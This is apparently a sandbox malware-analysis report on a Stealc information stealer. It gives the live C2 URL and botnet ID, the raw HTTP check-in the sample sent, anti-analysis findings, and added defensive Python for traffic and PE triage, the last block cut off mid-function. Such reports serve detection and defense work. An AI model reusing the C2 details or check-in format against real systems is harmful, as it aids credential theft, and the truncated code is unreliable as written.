
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523733
MD5: ff898723c4c693eec7140d101d0066d4
SHA1: 3127d0d4a74c0d4f3f05a548a39f2fad684c5cb8
SHA256: 61959a4f6720629f28f97cb7341d9ac81fb91c91e97ddc28f9840b6eae8bac58
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2956 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FF898723C4C693EEC7140D101D0066D4)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2956 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2956 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.990000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-02T00:37:03.842008+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.990000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00999AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00997240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00999B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDH
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 36 39 46 30 37 44 34 46 43 33 30 37 31 38 35 39 34 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 2d 2d 0d 0a
    Data Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="hwid"01F69F07D4FC3071859460------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="build"doma------KECBKKEBKEBFCAAAEGDH--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (7 connections)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00994880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and body as the POST listed above, reported again because it carries no User-Agent header)
Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/2
Source: file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090478959.0000000001613000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=k
Source: file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpDH
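The Suricata hit and the POST above are what a detection engineer keys on. The following is an added example, written for this page rather than taken from Joe Sandbox or from Stealc itself. It re-assembles the captured check-in from the Data Raw hex in the report (CRLF line endings restored from the 0d 0a bytes), splits the multipart body, and scores the request on the traits visible in this capture: a POST to a .php path, a multipart form whose only fields are hwid and build, no User-Agent header, and a bare IP address in Host. That trait list is an assumption drawn from this one capture, not the content of ET rule 2044243; the benign request used for comparison is constructed.

```python
import re

# Constructed test input: the C2 check-in captured in this report, re-assembled
# from its "Data Raw" hex with CRLF line endings. The body is exactly 211 bytes.
STEALC_CHECKIN = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDH\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------KECBKKEBKEBFCAAAEGDH\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"01F69F07D4FC3071859460\r\n"
    b"------KECBKKEBKEBFCAAAEGDH\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------KECBKKEBKEBFCAAAEGDH--\r\n"
)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value bytes} for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        part = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        part_head, _, part_body = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_head)
        if match:
            # the CRLF preceding the next delimiter belongs to the delimiter, not the value
            value = part_body[:-2] if part_body.endswith(b"\r\n") else part_body
            fields[match.group(1).decode("ascii")] = value
    return fields


def classify_checkin(raw: bytes) -> dict:
    """Score one request against the traits seen in this report's check-in (assumed traits)."""
    method, path, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    boundary = re.search(r"boundary=([^;]+)", ctype)
    fields = {}
    if ctype.startswith("multipart/form-data") and boundary:
        fields = parse_multipart(body, boundary.group(1).strip())
    traits = {
        "post_to_php": method == "POST" and path.lower().endswith(".php"),
        "no_user_agent": "user-agent" not in headers,
        "host_is_bare_ip": re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", headers.get("host", "")) is not None,
        "hwid_and_build_only": set(fields) == {"hwid", "build"},
    }
    return {
        "fields": {k: v.decode("latin-1") for k, v in fields.items()},
        "declared_length": int(headers.get("content-length", "-1")),
        "body_length": len(body),
        "traits": traits,
        "stealc_checkin": all(traits.values()),
    }
```

classify_checkin(STEALC_CHECKIN) returns hwid 01F69F07D4FC3071859460 and build doma with every trait true; the body length of 211 matching Content-Length is a cheap check that the hex dump was decoded faithfully. Requests re-assembled from a PCAP can be fed through the same function to triage similar traffic, and a hit on the field set alone, without the other traits, is worth a look on its own.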

System Summary

Source: file.exe | Static PE information: section name: (unnamed)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (unnamed)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE58E7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0A899
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D28866
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6203A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D5D02B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D671FC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C412FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D5EA73
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6C27F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C14BD5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D72B85
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF233E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6DC82
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D59C03
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4BEDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6AEB1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D65650
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D5B65D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D397F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D1C737
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009945C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: yvmyyuzz ZLIB complexity 0.9950593703976436
Source: file.exe, 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0352QAC9.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT name, value FROM autofill;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1894400 > 1048576
Source: file.exe | Static PE information: Raw size of yvmyyuzz is bigger than: 0x100000 < 0x1a8600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.990000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yvmyyuzz:EW;loyfpxav:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yvmyyuzz:EW;loyfpxav:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d28f6 should be: 0x1d7de7
Source: file.exe | Static PE information: section name: (unnamed)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (unnamed)
Source: file.exe | Static PE information: section name: yvmyyuzz
Source: file.exe | Static PE information: section name: loyfpxav
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DFF8F8 push ecx; mov dword ptr [esp], 1571F95Dh | 0_2_00DFF81F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DFF8F8 push eax; mov dword ptr [esp], 7B5547DBh | 0_2_00DFF8C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DFF8F8 push 0BDACE33h; mov dword ptr [esp], ebx | 0_2_00DFF91B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE58E7 push ebp; mov dword ptr [esp], eax | 0_2_00CE58EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE58E7 push esi; mov dword ptr [esp], edx | 0_2_00CE5902
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE58E7 push ecx; mov dword ptr [esp], edi | 0_2_00CE5979
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE58E7 push 4AEB3A27h; mov dword ptr [esp], edx | 0_2_00CE5A42
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE58E7 push 04CBA347h; mov dword ptr [esp], eax | 0_2_00CE5A51
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D910E1 push edx; mov dword ptr [esp], eax | 0_2_00D910FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2C0FD push edx; mov dword ptr [esp], ebx | 0_2_00C2C169
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2C0FD push ebx; mov dword ptr [esp], esp | 0_2_00C2C198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2C0FD push esi; mov dword ptr [esp], 76658547h | 0_2_00C2C1E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2C0FD push edi; mov dword ptr [esp], 7DCBA8DEh | 0_2_00C2C1EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2C0FD push 770DD9BCh; mov dword ptr [esp], ecx | 0_2_00C2C26E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2C0FD push edx; mov dword ptr [esp], ecx | 0_2_00C2C29F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2C0FD push 3789DBACh; mov dword ptr [esp], edx | 0_2_00C2C2F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D9A899 push 4700DA2Bh; mov dword ptr [esp], edi | 0_2_00D9A8B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D9A899 push edi; mov dword ptr [esp], esp | 0_2_00D9A8D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE389E push ecx; mov dword ptr [esp], eax | 0_2_00DE3946
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0A899 push 7941ABA2h; mov dword ptr [esp], edx | 0_2_00C0A8CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0A899 push 231B453Ah; mov dword ptr [esp], eax | 0_2_00C0A941
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0A899 push 4BF99C17h; mov dword ptr [esp], ebx | 0_2_00C0A949
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0A899 push 46CA99A3h; mov dword ptr [esp], ecx | 0_2_00C0A9B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E16081 push edx; mov dword ptr [esp], ecx | 0_2_00E16085
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E16081 push eax; mov dword ptr [esp], ecx | 0_2_00E16111
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E16081 push edx; mov dword ptr [esp], esp | 0_2_00E1611A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1488C push 57E1866Ah; mov dword ptr [esp], edx | 0_2_00E148F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1488C push eax; mov dword ptr [esp], esi | 0_2_00E14933
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AB035 push ecx; ret | 0_2_009AB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D28866 push eax; mov dword ptr [esp], ecx | 0_2_00D288DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D28866 push 7461E651h; mov dword ptr [esp], edx | 0_2_00D288E7
Source: file.exe | Static PE information: section name: yvmyyuzz entropy: 7.954108678266825
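Four of the static findings above (entry point in .taggant, a header checksum of 0x1d28f6 where 0x1d7de7 was expected, non-standard section names, and yvmyyuzz at 7.95 bits of entropy) are cheap to reproduce without the sandbox. The following is an added example, not Joe Sandbox's code, that implements those checks over a raw PE32 image with only the standard library: Shannon entropy per section, the section that contains AddressOfEntryPoint, and a reimplementation of the documented Windows CheckSumMappedFile algorithm (one's-complement sum of 32-bit words with the CheckSum field excluded, folded to 16 bits, plus the file length). Because the analysed sample is not on the page, build_sample_pe constructs a toy PE that mimics its layout (entry point in a .taggant section, a high-entropy section named like loyfpxav); the list of "standard" section names and the 7.0-bit entropy threshold are the example's own choices, not Windows rules.

```python
import math
import struct

# The example's own notion of "standard" section names (an assumption, not a Windows rule).
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".idata", ".edata",
                          ".rsrc", ".reloc", ".bss", ".tls", ".pdata", ".CRT"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 when all 256 values are equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_checksum(data: bytes) -> int:
    """CheckSumMappedFile algorithm: one's-complement sum of all 32-bit words with the
    CheckSum field itself excluded, folded to 16 bits, plus the file length."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    checksum_off = pe_off + 4 + 20 + 64    # "PE\0\0" + COFF header + offset inside the optional header
    if checksum_off + 4 > len(data):
        raise ValueError("truncated PE headers")
    buf = bytearray(data)
    buf[checksum_off:checksum_off + 4] = b"\0\0\0\0"   # zeroing the field excludes it from the sum
    buf += b"\0" * (-len(buf) % 4)
    total = 0
    for off in range(0, len(buf), 4):
        total += struct.unpack_from("<I", buf, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def triage_pe(data: bytes) -> dict:
    """Entry-point section, checksum validity, section names and per-section entropy."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    n_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt = pe_off + 24
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    declared = struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        name = name.rstrip(b"\0").decode("latin-1")
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "va": va, "span": max(vsize, raw_size),
                         "entropy": round(shannon_entropy(raw), 3)})
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry_rva < s["va"] + s["span"]), None)
    computed = pe_checksum(data)
    flags = []
    if entry_section not in STANDARD_SECTION_NAMES:
        flags.append("entry point outside standard sections")
    if declared != computed:
        flags.append(f"invalid checksum: header 0x{declared:x}, computed 0x{computed:x}")
    for s in sections:
        if not s["name"] or not s["name"].isprintable():
            flags.append("section name with special chars")
        elif s["name"] not in STANDARD_SECTION_NAMES:
            flags.append(f"non-standard section name: {s['name']}")
        if s["entropy"] > 7.0:    # packed/encrypted payload threshold (assumption)
            flags.append(f"high-entropy section: {s['name']}")
    return {"entry_section": entry_section, "checksum_ok": declared == computed,
            "sections": sections, "flags": flags}

def build_sample_pe(sections, entry_section, checksum=None) -> bytes:
    """Constructed toy PE32 for offline testing (not the analysed sample):
    0x200 file alignment, 0x1000 section alignment, first section at RVA 0x1000."""
    file_align, sect_align, opt_size = 0x200, 0x1000, 224
    headers_len = -(-(0x40 + 24 + opt_size + 40 * len(sections)) // file_align) * file_align
    raw_ptr, va, entry_rva, hdrs, body = headers_len, sect_align, 0, b"", b""
    for name, data in sections:
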